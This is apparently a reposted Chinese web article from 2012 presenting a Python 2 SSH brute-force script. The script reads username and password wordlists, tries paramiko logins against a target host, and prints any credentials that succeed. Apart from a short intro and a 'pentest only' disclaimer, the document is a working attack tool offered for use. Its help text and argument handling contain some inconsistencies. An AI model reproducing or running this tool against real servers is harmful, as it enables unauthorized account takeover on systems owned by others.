python SSH暴力破解工具
2012-05-17 13:05:34 来源:WEB开发网核心提示: 前面写了一个关于ftp的brute force的工具,但是发现身边搞技术的越来越少用ftp进行文件传输了,python SSH暴力破解工具,大多都使用ssh了,所以这里写了一个关于ssh的brute force工具玩玩,这样会快些,先把代码放着里,练练手, 现在发现这个脚本有个缺陷
前面写了一个关于ftp的brute force的工具,但是发现身边搞技术的越来越少用ftp进行文件传输了。大多都使用ssh了。所以这里写了一个关于ssh的brute force工具玩玩,练练手。
现在发现这个脚本有个缺陷,就是,如果你的字典很大的话速度就会比较慢,后面先把他搞成多线程的,这样会快些,先把代码放着里,希望大家多多给意见,多多交流!!!
#!/usr/bin/env python #-*-coding = UTF-8-*- #author@:dengyongkai #blog@:blog.sina.com.cn/kaiyongdeng import sys import os import time #from threading import Thread try: from paramiko import SSHClient from paramiko import AutoAddPolicy except ImportError: print G+''' You need paramiko module. http://www.lag.net/paramiko/ Debian/Ubuntu: sudo apt-get install aptitude : sudo aptitude install python-paramiko\n'''+END sys.exit(1) docs = """ [*] This was written for educational purpose and pentest only. Use it at your own risk. [*] Author will be not responsible for any damage! [*] Toolname : ssh_bf.py [*] Author : xfk [*] Version : v.0.2 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help] """ if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) R = "\033[31m"; G = "\033[32m"; Y = "\033[33m" END = "\033[0m" def logo(): print G+"\n |---------------------------------------------------------------|" print " | |" print " | blog.sina.com.cn/kaiyongdeng |" print " | 16/05/2012 ssh_bf.py v.0.2 |" print " | SSH Brute Forcing Tool |" print " | |" print " |---------------------------------------------------------------|\n" print " \n [-] %s\n" % time.ctime() print docs+END def help(): print Y+" [*]-H --hostname/ip <>the target hostname or ip address" print " [*]-P --port <>the ssh service port(default is 22)" print " [*]-U --usernamelist <>usernames list file" print " [*]-P --passwordlist <>passwords list file" print " [*]-H --help <>show help information" print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END sys.exit(1) def BruteForce(hostname,port,username,password): ''' Create SSH connection to target ''' ssh = SSHClient() ssh.set_missing_host_key_policy(AutoAddPolicy()) try: ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False) status = 'ok' ssh.close() except Exception, e: status = 'error' pass return status def makelist(file): ''' Make usernames and passwords lists ''' items = [] try: fd = open(file, 'r') except IOError: print R+'unable to read file \'%s\'' % file+END pass except Exception, e: print R+'unknown error'+END pass for line in fd.readlines(): item = line.replace('\n', '').replace('\r', '') items.append(item) fd.close() return items def main(): logo() # print "hello wold" try: for arg in sys.argv: if arg.lower() == '-t' or arg.lower() == '--target': hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2]) if arg.lower() == '-p' or arg.lower() == '--port': port = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-u' or arg.lower() == '--userlist': userlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-h' or arg.lower() == '--help': help() elif len(sys.argv) <= 1: help() except: print R+"[-]Cheak your parametars input\n"+END help() print G+"\n[!] BruteForcing target ...\n"+END # print "here is ok" # print hostname,port,wordlist,userlist usernamelist = makelist(userlist) passwordlist = makelist(wordlist) print Y+"[*] SSH Brute Force Praparing." print "[*] %s user(s) loaded." % str(len(usernamelist)) print "[*] %s password(s) loaded." % str(len(passwordlist)) print "[*] Brute Force Is Starting......."+END try: for username in usernamelist: for password in passwordlist: print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END current = BruteForce(hostname, port, username, password) if current == 'error': print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END # pass else: print G+"\n[+] ^-^ HaHa,We Got It!!!" print "[+] username: %s" % username print "[+] password: %s\n" % password+END # sys.exit(0) except: print R+"\n[-] There Is Something Wrong,Pleace Cheak It." print "[-] Exitting.....\n"+END raise print Y+"[+] Done.^-^\n"+END sys.exit(0) if __name__ == "__main__": main()
赞助商链接